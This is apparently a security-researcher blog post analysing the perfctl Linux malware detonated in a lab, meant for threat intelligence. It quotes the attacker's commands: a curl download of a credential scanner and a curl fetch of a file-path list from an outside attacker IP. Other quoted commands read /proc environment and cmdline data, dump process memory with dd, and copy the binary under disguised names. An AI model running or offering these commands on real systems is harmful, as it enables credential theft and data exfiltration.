From Perfctl to InfoStealer

Published: 2024-10-09. Last Updated: 2024-10-09 07:18:37 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

A few days ago, a new stealthy malware targeting Linux hosts made a lot of noise: perfctl[1]. The malware has been pretty well analyzed and I won’t repeat what has been already disclosed. I found a copy of the "httpd" binary (SHA256:22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13)[2]. I dropped the malware in my lab to see how it detonated. I infected the lab without root privileges and detected the same behavior except files were not written to some locations due to a lack of access (not root). When executing without root privileges, the rootkit feature is unavailable and the malware runs "disclosed".

After the sandbox infection, I had two running processes:

  • perfctl
  • gnome-session-binary (This name can be different and mimic well-known Linux processes)

The resources used by the two processes are:

remnux@remnux:/$ sudo lsof -p 2637
COMMAND    PID   USER   FD      TYPE             DEVICE SIZE/OFF    NODE NAME
gnome-ses 2637 remnux  cwd       DIR                8,5     4096 1967470 /var/tmp/test
gnome-ses 2637 remnux  rtd       DIR                8,5     4096       2 /
gnome-ses 2637 remnux  txt       REG                8,5  9301499 2498448 /tmp/.perf.c/gnome-session-binary (deleted)
gnome-ses 2637 remnux  mem       REG                8,5 21444668  794483 /tmp/.xdiag/tordata/cached-microdescs
gnome-ses 2637 remnux  mem       REG                8,5     3552 2245832 /usr/share/zoneinfo/America/New_York
gnome-ses 2637 remnux    0r      CHR                1,3      0t0       6 /dev/null
gnome-ses 2637 remnux    1w      CHR                1,3      0t0       6 /dev/null
gnome-ses 2637 remnux    2w      CHR                1,3      0t0       6 /dev/null
gnome-ses 2637 remnux    3u     IPv4             186838      0t0     TCP remnux:44010->tor-exit-read-me.dfri.se:http (ESTABLISHED)
gnome-ses 2637 remnux    4u  a_inode               0,14        0   12517 [eventpoll]
gnome-ses 2637 remnux    5r     FIFO               0,13      0t0   58960 pipe
gnome-ses 2637 remnux    6w     FIFO               0,13      0t0   58960 pipe
gnome-ses 2637 remnux    7u     unix 0xffff8b2abaa0dc00      0t0   71705 type=STREAM
gnome-ses 2637 remnux    8u     unix 0xffff8b2abaa09800      0t0   58991 /tmp/.xdiag/int/.per.s type=STREAM
gnome-ses 2637 remnux    9u     unix 0xffff8b2abaa0e000      0t0   71704 type=STREAM
gnome-ses 2637 remnux   10u  a_inode               0,14        0   12517 [eventpoll]
gnome-ses 2637 remnux   11r     FIFO               0,13      0t0   71706 pipe
gnome-ses 2637 remnux   12w     FIFO               0,13      0t0   71706 pipe
gnome-ses 2637 remnux   13uW     REG                8,5        0  794471 /tmp/.xdiag/tordata/lock
gnome-ses 2637 remnux   14u     IPv4              68064      0t0     TCP localhost:37959 (LISTEN)
gnome-ses 2637 remnux   15u     IPv4              71708      0t0     TCP localhost:63582 (LISTEN)
gnome-ses 2637 remnux   16u     IPv4             187544      0t0     TCP localhost:44870->localhost:46606 (ESTABLISHED)
gnome-ses 2637 remnux   17u     IPv4             187546      0t0     TCP localhost:48816->localhost:63582 (ESTABLISHED)
gnome-ses 2637 remnux   18u     IPv4             187547      0t0     TCP localhost:63582->localhost:48816 (ESTABLISHED)
gnome-ses 2637 remnux   19u     IPv4              68080      0t0     TCP remnux:42126->tor-exit.exs.no:https (ESTABLISHED)
gnome-ses 2637 remnux   20r     FIFO               0,13      0t0  187612 pipe
gnome-ses 2637 remnux   21u     IPv4              71788      0t0     TCP localhost:44870 (LISTEN)
gnome-ses 2637 remnux   22u     IPv4              71790      0t0     TCP localhost:44869 (LISTEN)
gnome-ses 2637 remnux   23w     FIFO               0,13      0t0  187612 pipe
gnome-ses 2637 remnux   24r     FIFO               0,13      0t0  187613 pipe
gnome-ses 2637 remnux   25w     FIFO               0,13      0t0  187613 pipe

remnux@remnux:/$ sudo lsof -p 2791
COMMAND  PID   USER   FD      TYPE             DEVICE SIZE/OFF    NODE NAME
perfctl 2791 remnux  cwd       DIR                8,5     4096       2 /
perfctl 2791 remnux  rtd       DIR                8,5     4096       2 /
perfctl 2791 remnux  txt       REG                8,5  1727132 2498457 /tmp/.perf.c/perfctl
perfctl 2791 remnux    0r      CHR                1,3      0t0       6 /dev/null
perfctl 2791 remnux    1w      CHR                1,3      0t0       6 /dev/null
perfctl 2791 remnux    2w      CHR                1,3      0t0       6 /dev/null
perfctl 2791 remnux    3u  a_inode               0,14        0   12517 [eventpoll]
perfctl 2791 remnux    4r     FIFO               0,13      0t0   68184 pipe
perfctl 2791 remnux    5w     FIFO               0,13      0t0   68184 pipe
perfctl 2791 remnux    6r     FIFO               0,13      0t0   71857 pipe
perfctl 2791 remnux    7u     unix 0xffff8b2abaa0dc00      0t0   71705 type=STREAM
perfctl 2791 remnux    8w     FIFO               0,13      0t0   71857 pipe
perfctl 2791 remnux    9u  a_inode               0,14        0   12517 [eventfd]
perfctl 2791 remnux   10u  a_inode               0,14        0   12517 [eventfd]
perfctl 2791 remnux   11u  a_inode               0,14        0   12517 [eventfd]
perfctl 2791 remnux   12r      CHR                1,3      0t0       6 /dev/null
perfctl 2791 remnux   13u     IPv4             186859      0t0     TCP localhost:46606->localhost:44870 (ESTABLISHED)

That's exactly what has been described in the initial malware analysis: Tor is used for external communications and inter-process communications ate performed via sockets:

tor-exit-read-me.dfri.se:443 <-> (:42126) gnome-session-binary (127.0.0.1:46606) <-> (127.0.0.1:44870) perfctl

The malware also implants a backdoor allowing remote access to the Attacker.

Indeed, after approximately 30 minutes, I saw more activity ongoing. The Attacker dropped and executed a bunch of scripts to perform a footprint of the compromised host, search for interesting files/credentials, and exfiltrate them. All files were dropped in a sub-directory in the infected user's home directory:

remnux@remnux:~/.atmp/tmp/.applocal.xdiag$ ls -al
total 2752
drwx------  1 remnux  remnux   32768  8 Oct 14:34 .
drwx------  1 remnux  remnux   32768  8 Oct 10:03 ..
-rwx------  1 remnux  remnux      36  8 Oct 09:26 aa.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:06 cloud_meta.txt
-rwx------  1 remnux  remnux      64  8 Oct 09:26 debug.txt
drwx------  1 remnux  remnux   32768  8 Oct 09:07 docker
-rwx------  1 remnux  remnux    7745  8 Oct 09:24 environs.txt
-rwx------  1 remnux  remnux  208084  8 Oct 09:07 files.txt
drwx------  1 remnux  remnux   32768  8 Oct 09:20 files_other
drwx------  1 remnux  remnux   32768  8 Oct 09:20 files_th
-rwx------  1 remnux  remnux       0  8 Oct 09:13 foi.cry.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:13 foi.fds.txt
-rwx------  1 remnux  remnux     612  8 Oct 09:13 foi.fs.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:24 foi.varlib.txt
-rwx------  1 remnux  remnux   29994  8 Oct 09:24 foi.xy.txt
-rwx------  1 remnux  remnux   49776  8 Oct 09:06 host.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:06 i1run1dmen
-rwx------  1 remnux  remnux    6592  8 Oct 09:06 local_users.txt
-rwx------  1 remnux  remnux    2682  8 Oct 09:06 modules.txt
-rwx------  1 remnux  remnux    3705  8 Oct 09:06 net.txt
-rwx------  1 remnux  remnux  124006  8 Oct 09:24 process.env.txt
-rwx------  1 remnux  remnux   20141  8 Oct 09:24 process.mem.txt
-rwx------  1 remnux  remnux  470494  8 Oct 14:54 rex.filepaths.large-1.txt
-rwx------  1 remnux  remnux       0  8 Oct 09:26 rver1
-rwx------  1 remnux  remnux    2370  8 Oct 09:08 th.filesystem.secrets.found.txt

To analyze the malware behavior, I used kunai[3] to record the system activity.

The main tool downloaded is TruffleHog[4], a well-known credentials scanner that can scan many different local or remote places. The file was downloaded from the official repository:

curl -m 1800 -fsSLk hxxps://github[.]com/trufflesecurity/trufflehog/releases/download/v3.78.2/trufflehog_3.78.2_linux_amd64.tar.gz -o th.tar.gz
tar zxvf th.tar.gz trufflehog
chmod +x trufflehog
./trufflehog --help
mv trufflehog thg
xargs -0 ./thg --concurrency=2 --no-update --no-verification --include-detectors=all filesystem
rm -f thg

I'm not sure if the scan was launched automatically or by a human: Why the TruffleHog binary was executed with the "--help" parameter? Strange.

Here is the result file:

remnux@remnux:~/.atmp/tmp/.applocal.xdiag$ cat th.filesystem.secrets.found.txt
Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://jschmoe:xyzzy@www.bogus.net:8000
File: /opt/procdot/plugins/pcap_tools/tcl/tcl8/http-2.8.7.tm
Line: 413

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://jschmoe:xyzzy@www.bogus.net:8000
File: /opt/procdot/plugins/pcap_tools/tcl/tcl8/http-2.8.7.tm
Line: 28

Found unverified result ???
Verification issue: More than one detector has found this result. For your safety, verification has been disabled.You can override this behavior by using the --allow-verification-overlap flag.
Detector Type: FTP
Decoder Type: PLAIN
Raw result: ftp://joe:password@proxy.example.com
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 105

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://joe:password@proxy.example.com
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 98

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://joe:password@proxy.example.com:3128
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 100

Found unverified result ???
Detector Type: URI
Decoder Type: PLAIN
Raw result: http://joe:password@proxy.example.com
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py
Line: 98

Found unverified result ???
Detector Type: JDBC
Decoder Type: PLAIN
Raw result: jdbc:mysql://localhost/ziclix
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/dbexts.py
Line: 30

Found unverified result ???
Detector Type: JDBC
Decoder Type: PLAIN
Raw result: jdbc:postgresql://localhost:5432/ziclix
File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/dbexts.py
Line: 38

Found unverified result ???
Detector Type: Github
Decoder Type: PLAIN
Raw result: 9813cde2db1f31f92fed49a4dd8aa29b21d72581
Rotation_guide: https://howtorotate.com/docs/tutorials/github/
Version: 1
File: /opt/ghidra/Ghidra/application.properties
Line: 10

Found unverified result ???
Detector Type: Github
Decoder Type: PLAIN
Raw result: 44ca5b263a955ba19ec4f57a5646d4a406a34f70
Rotation_guide: https://howtorotate.com/docs/tutorials/github/
Version: 1
File: /opt/ghidra/Ghidra/application.properties
Line: 11

The next step was to search for interesting files using a dictionary downloaded from the following URL:

curl -m 1800 -fsSLk hxxp://104[.]183[.]100[.]189/common/backup.list -o rex.filepaths.large-1.txt

The download file contains 19K+ regular expressions to match juicy files on a file system. Example:

...
/09-managing-state/end/vue-heroes/\.env$
/0-flannel\.conf$
/0\.htpasswd$
/0loginlog$
/10-flannel\.conf$
/1C/conf$
/1C/config$
/1confirmssr\.htm$
/1\.htpasswd$
/1loginlog$
/1password$
/2004conference$
/2009-conference$
/2015/kj/config\.js$
/2019/wp-login\.php$
/2020/wp-login\.php$
/2021/wp-login\.php$
/2loginlog$
/31_structure_tests/\.env$
/3digitcode\.php$
/3loginlog$
/3-sequelize/final/\.env$
...

The Attacker searched for many regular expressions and more in the list of discovered files. Then, he/she parsed also the /proc file system for interesting processes:

ls -l /proc/1327/exe
grep -s -q KMHt5Ykyq3ZkgI8CZ /proc/1327/cmdline
grep -s -q 5Y4B2Se2L4VPL6Z5nKMgIv5Ih3+oxkb5EqmzE768BFo= /proc/1327/cmdline
cat /proc/1327/environ
cat /proc/1327/cmdline
cat /proc/1327/maps

He/she also scrapped the processes' memory for interesting data by performing multiple dumps of the memory:

dd if=/proc/1327/mem bs=4096 iflag=skip_bytes,count_bytes skip=94423105585152 count=4096

Potential dockers were also inspected:

docker images
docker ps
docker ps -a

The malware replicated itself multiple times by creating new binaries:

cp /proc/62759/exe /tmp/.perf.c/ibus-x11
cp /proc/63602/exe /tmp/.perf.c/gnome-session-ctl
cp /proc/64431/exe /tmp/.perf.c/ibus-daemon
cp /proc/65271/exe /tmp/.perf.c/ibus-x11
cp /proc/6549/exe /tmp/.perf.c/pulseaudio
cp /proc/66088/exe /tmp/.perf.c/vmtoolsd
cp /proc/66919/exe /tmp/.perf.c/ibus-daemon
cp /proc/67754/exe /tmp/.perf.c/ibus-x11
cp /proc/68583/exe /tmp/.perf.c/jq
cp /proc/69428/exe /tmp/.perf.c/systemd
cp /proc/70242/exe /tmp/.perf.c/ssh-agent
cp /proc/71046/exe /tmp/.perf.c/python3
cp /proc/71062/exe /dev/shm/libfsnldev.so
cp /proc/71062/exe /dev/shm/libpprocps.so
cp /proc/71062/exe /lib/libfsnldev.so
cp /proc/71062/exe /lib/libpprocps.so
cp /proc/7411/exe /tmp/.perf.c/systemd
cp /proc/8248/exe /tmp/.perf.c/ibus-x11
cp /proc/9084/exe /tmp/.perf.c/ibus-x11
cp /proc/9914/exe /tmp/.perf.c/systemd

Once all details are collected, they are stored in a Tar archive and exfiltrated:

trunk.6f7794aa1bd1b2b8d26eb2eae5f8df37_169.155.242.252_.tar.gz

Conclusion: If just a "simple" cryptominer seems to be deployed by Attackers, they can also steal your data and probably abuse your compromised hosts in many different ways!

[1] https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/
[2] https://www.virustotal.com/gui/file/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
[3] https://isc.sans.edu/diary/Kunai+Keep+an+Eye+on+your+Linux+Hosts+Activity/31054
[4] https://github.com/trufflesecurity/trufflehog

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)
ISC Stormcast For Wednesday, October 9th, 2024 https://isc.sans.edu/podcastdetail/9172

Comments


Diary Archives